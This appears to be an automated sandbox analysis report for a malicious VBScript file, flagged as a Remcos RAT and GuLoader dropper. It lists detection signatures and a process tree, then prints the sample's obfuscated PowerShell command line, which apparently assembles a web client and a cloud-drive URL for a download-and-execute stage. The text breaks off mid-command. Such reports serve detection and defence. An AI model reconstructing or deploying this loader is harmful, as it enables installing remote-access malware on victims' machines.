Windows
Analysis Report
CO894GOV2O25.vbs
Overview
General Information
Detection
Remcos, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 4212 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\CO894 GOV2O25.vb s" MD5: A47CBE969EA935BDD3AB568BB126BC80) PING.EXE (PID: 7340 cmdline:
ping Host_ 6637.6637. 6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D) conhost.exe (PID: 7348 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7424 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "echo $Tal tegns;func tion janey ($Naturpro dukt){ .($ Glassliber es) ($Natu rprodukt)} function Infractor( $Naturaliz ation){$Re acquainted 129=4;do{$ Cozies104+ =$Naturali zation[$Re acquainted 129];$Reac quainted12 9+=5;$Bemo il=Format- List} unti l(!$Natura lization[$ Reacquaint ed129])$Co zies104}$V agttaarnen es=Infract or 'W xbNp araeCentTR ck. Blow' ;$Vagttaar nenes+=Inf ractor 'Ba nEPjevbAw akc,arelTo baIBlepESq u NSprot'; $Dysbulic= Infractor 'TekrMGroo oMindzafpr iSirilD bi l DigaDa b /';$Altngl erne92=Inf ractor 'Im p TEthylFr emsGrap1Sp ot2';$Segr egerede=' Rig[MaksNN e,oEBechtB .ro.p.gwS k peKam.rI sagvAandiF orpC SpeeV askPSpgeor elai PhoNk ompTHumoM. eroa m rnS angA alcG Rele BilRA lop]smre:K iss: ejssC bfte sivc Su UOpharK ar i ongTP en yAgnopH arlr.ariOn ecet F.ro. jenCMjesoC ollLRime=D .mp$WencaE scalPhostO vernBaneGT olvLScraES aldRU,pfNS getE Asy9f lyw2';$Dys bulic+=Inf ractor ' f re5S,rg. C ar0Opse Re si(SygeW S .ci FlynPs eudSpekoM. ljwK lvsUl .i ModuN i ceT Unv Ba rn1Homo0Tr ib.Biod0Be i;Be t co d,WCar ih llnBefo6Mi st4Nonn;Kr ad FripxF rs6apra4St an;Rec. Ma rrArvevCla s:Rhod1Ufo 3 Fol4 Op f.Unif0L v s)Ud a Sic kG erceMas ocTrogk,on roGen,/Gon o2,igo0K,p i1mass0U.i n0 Dal1Fie l0 ata1 En t B,deFOv, riPar rIne .eOve f oi co Mi xSud a/ We 1Kni g3Macu4 Sc o.Ko t0';$ Quillaias1 80=Infract or 'LocauS lagsBakkE Exirtogd-i n dAHjlpgU n,ee He NU nunT';$Aab ningstider nes=Infrac tor ' upmh Keglt .rnt Le,sptri s Til: hor/ San /Octad KnsfrMik.i sliv Ante U.u. ,leg Eft oquafo Polyg Prol nae Aut.S ,idcCorroJ ug mOffe/ Re u KatcS pl ? ,loeM e axRi,dpU nd,oSp,rrS aldtLion=U n vdErhvoC oncw abnEp iclskovoMi ssaKunsd F ro&UnsaiAn tidOpsu=As pa1Dep,yIr on_Fr gMPe nnUEndo1.m atISammxMe lotUmrkx , uiQUdhuaMo raDU.ign,w ee_KundfFi a6Sala5 V icC HornLo uv0 T gb F erFSti 8Be dlLChlof,i sc0.tlnXBu scC I o8Al deUCong0U deI';$Rota tionspumpe rne=Infrac tor ' Ugi> ';$Glassli beres=Infr actor 'Dor mitilieV w eX';$Eliqu ating='Gul vs';$Klatr ende='\Uds killeres.B re';janey (Infractor ',itr$Out cGUnscl Ke lO ,ncBnon eaResulAad ,:,rspiC a zN F,lTSpe er .blaOce aVrem E As cnSchcs il l= et$Elka EWar nE.ch vRdbe:Nonc aLas.P Und pDiamDNegr a FortInad aSylv+Skry $ yrbkarse LSalmAf rg TUnpir Air ESc.rNSkra d esE');ja ney (Infra ctor ' Erk $PhysgBenz LHemaOArko bLokaaR ad lSkul:Ludw MS riIGrat CCharM Oct AStatcSmre =R fu$Inge aAnesa esB LillnSandi plynN mreg AgenS A aT uttiCappD Fu,dE,forR hollN Unfe u,shS Nay. KerySTriep Her LOgleI LdenT ag(e v,j$Popur telO Best GalASo ntA uxiIRegrOP erfn munST illPSam uA lvemSerpp Ac,eWarprL andN Pg ED ,fr)');jan ey (Infrac tor $Segre gerede);$A abningstid